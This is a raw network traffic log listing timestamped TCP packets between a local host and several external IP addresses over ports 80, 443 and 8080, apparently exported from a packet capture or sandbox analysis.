Dec 1, 2024 22:52:07.354475021 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.363750935 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.363850117 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.434632063 CET	49753	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:52:07.436130047 CET	49754	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:52:07.440453053 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.460377932 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.462275028 CET	49755	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.483925104 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.513082981 CET	49756	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.515319109 CET	49757	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.527559996 CET	49758	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:07.554646969 CET	80	49753	66.33.60.67	192.168.2.16
Dec 1, 2024 22:52:07.554764986 CET	49753	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:52:07.556114912 CET	80	49754	66.33.60.67	192.168.2.16
Dec 1, 2024 22:52:07.556174994 CET	49754	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:52:07.560771942 CET	80	49751	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.560854912 CET	49751	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.580657959 CET	80	49752	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.580733061 CET	49752	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.582197905 CET	80	49755	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.582274914 CET	49755	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.592118979 CET	49755	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.633122921 CET	80	49756	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.633272886 CET	49756	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.633332968 CET	49756	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.635256052 CET	80	49757	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.635337114 CET	49757	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.635953903 CET	49757	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:07.647607088 CET	80	49758	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:07.647695065 CET	49758	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:07.648715019 CET	49758	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:07.753551006 CET	80	49756	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.755837917 CET	80	49757	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:07.768829107 CET	80	49758	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:08.813530922 CET	80	49758	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:08.813632011 CET	80	49758	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:08.813729048 CET	49758	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:08.817636967 CET	49758	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:52:08.818855047 CET	49757	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.819267988 CET	49756	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.823976040 CET	49759	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.903872013 CET	49760	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.905129910 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.937880039 CET	80	49758	45.60.107.106	192.168.2.16
Dec 1, 2024 22:52:08.939194918 CET	80	49757	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:08.939273119 CET	49757	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.939588070 CET	80	49756	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:08.939637899 CET	49756	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.943990946 CET	80	49759	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:08.944077015 CET	49759	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.944670916 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:08.960921049 CET	49759	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:09.023893118 CET	80	49760	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:09.023992062 CET	49760	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:09.025053978 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:09.025136948 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:09.026369095 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:09.036483049 CET	49760	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:09.064552069 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:09.064656973 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:09.065138102 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:09.146308899 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:09.185178995 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:09.702027082 CET	49763	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:52:09.822057009 CET	80	49763	208.95.112.1	192.168.2.16
Dec 1, 2024 22:52:09.822207928 CET	49763	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:52:09.822374105 CET	49763	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:52:09.942316055 CET	80	49763	208.95.112.1	192.168.2.16
Dec 1, 2024 22:52:10.581478119 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:10.581494093 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:10.581609964 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:10.581955910 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:10.701858044 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:10.701978922 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:10.713942051 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:10.713953972 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:10.714046001 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:10.714277983 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:10.822232008 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:10.834230900 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:10.834327936 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:10.954351902 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.074321032 CET	80	49763	208.95.112.1	192.168.2.16
Dec 1, 2024 22:52:11.126149893 CET	49763	80	192.168.2.16	208.95.112.1
Dec 1, 2024 22:52:11.182193995 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.182327032 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.182406902 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.333718061 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.333796024 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.333888054 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.368545055 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.368638039 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.368742943 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.468679905 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.468822002 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.468962908 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.469527006 CET	49764	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:52:11.475275993 CET	49765	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:11.479827881 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:11.521083117 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.521109104 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.521167994 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.569526911 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.569547892 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.569607973 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.589504004 CET	80	49764	104.26.6.177	192.168.2.16
Dec 1, 2024 22:52:11.589606047 CET	49764	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:52:11.589751005 CET	49764	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:52:11.595175028 CET	80	49765	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:11.595253944 CET	49765	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:11.595387936 CET	49765	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:11.599841118 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:11.599915028 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:11.600003958 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:11.621891975 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.621969938 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.622025013 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.669838905 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.669898033 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.669986010 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.709664106 CET	80	49764	104.26.6.177	192.168.2.16
Dec 1, 2024 22:52:11.715265036 CET	80	49765	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:11.719892025 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:11.722142935 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.722191095 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.722254038 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.770629883 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.770752907 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.770853043 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.822616100 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.822675943 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.822738886 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.871093035 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.871179104 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.871253967 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.922828913 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.922844887 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.922904968 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:11.953366041 CET	49765	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:11.953381062 CET	49764	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:52:11.953450918 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:11.971595049 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.971671104 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:11.971738100 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.023185968 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.023364067 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.023483992 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.073755980 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.073901892 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.073914051 CET	80	49765	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:12.073923111 CET	80	49764	104.26.6.177	192.168.2.16
Dec 1, 2024 22:52:12.073932886 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.073940992 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.073950052 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.073964119 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.074045897 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.074156046 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.074167013 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.074174881 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.074183941 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.074192047 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.074199915 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.074209929 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.074222088 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.074276924 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.123740911 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.123794079 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.123874903 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.173901081 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.174052954 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.174170017 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.194195032 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.194210052 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.194217920 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.194226980 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.194237947 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.194304943 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.194336891 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.224009037 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.224026918 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.224077940 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.237411022 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.237551928 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.274272919 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.274296045 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.274446011 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.274764061 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.324160099 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.324227095 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.324327946 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.357439995 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.357543945 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.394666910 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.394774914 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.401434898 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.401503086 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.424309015 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.424401045 CET	80	49762	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.424459934 CET	49762	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.514784098 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.521409988 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.521472931 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.585544109 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.722075939 CET	80	49764	104.26.6.177	192.168.2.16
Dec 1, 2024 22:52:12.728965998 CET	80	49765	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:12.765490055 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:12.765697956 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:12.775152922 CET	49765	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:12.775163889 CET	49764	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:52:12.874916077 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.875034094 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:12.875097990 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:12.961347103 CET	80	49765	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:12.962758064 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:12.962805986 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:12.963012934 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:12.963272095 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:12.963284969 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:12.966609955 CET	80	49764	104.26.6.177	192.168.2.16
Dec 1, 2024 22:52:13.015249968 CET	49765	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:13.015249968 CET	49764	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:52:13.017460108 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:13.017544031 CET	49766	8080	192.168.2.16	140.238.218.94
Dec 1, 2024 22:52:13.061992884 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:13.062129974 CET	80	49761	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:13.062206984 CET	49761	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:13.108728886 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:13.108763933 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:13.108844042 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:13.109249115 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:13.109265089 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:13.149420977 CET	8080	49737	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:13.152225971 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.265552998 CET	8080	49766	140.238.218.94	192.168.2.16
Dec 1, 2024 22:52:13.272233963 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.272329092 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.272559881 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.392513990 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.622320890 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.742393970 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742405891 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742422104 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742432117 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742496014 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742511988 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.742532969 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742562056 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.742569923 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742584944 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.742607117 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742619991 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.742652893 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.742697954 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742743969 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.742744923 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.742795944 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.862446070 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.862551928 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.862580061 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.862591982 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.862603903 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.862654924 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.862669945 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.862672091 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.862715006 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:13.905353069 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:13.905488014 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:14.026067972 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:14.026189089 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:14.070179939 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:14.070364952 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:14.190375090 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:14.233515024 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:14.233664036 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:14.312508106 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:14.312659025 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:14.324006081 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:14.324172020 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:14.326386929 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:14.326401949 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:14.326642990 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:14.354583025 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:14.369184971 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:14.369313955 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:14.370264053 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:14.370326042 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:14.372047901 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:14.372055054 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:14.372312069 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:14.374175072 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:14.388995886 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:14.389013052 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:14.433554888 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:14.433720112 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:14.435327053 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:14.435338974 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:14.814639091 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:14.814657927 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:14.814701080 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:14.814738035 CET	443	49767	104.244.42.129	192.168.2.16
Dec 1, 2024 22:52:14.814780951 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:14.814832926 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:14.815567970 CET	49767	443	192.168.2.16	104.244.42.129
Dec 1, 2024 22:52:14.954504967 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:14.954540968 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:14.954613924 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:14.958575010 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:14.958599091 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:15.125200987 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:15.125305891 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:15.125504017 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:15.125823021 CET	49769	8080	192.168.2.16	46.235.26.83
Dec 1, 2024 22:52:15.129086971 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.130595922 CET	49772	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:15.245735884 CET	8080	49769	46.235.26.83	192.168.2.16
Dec 1, 2024 22:52:15.249020100 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.249381065 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.249587059 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.250543118 CET	80	49772	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:15.250658035 CET	49772	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:15.250762939 CET	49772	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:15.369538069 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.370625973 CET	80	49772	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:15.601423025 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.721604109 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721640110 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721689939 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721699953 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721760035 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721770048 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721787930 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.721848965 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.721852064 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721859932 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721919060 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.721956968 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.721966982 CET	8080	49771	168.119.121.16	192.168.2.16
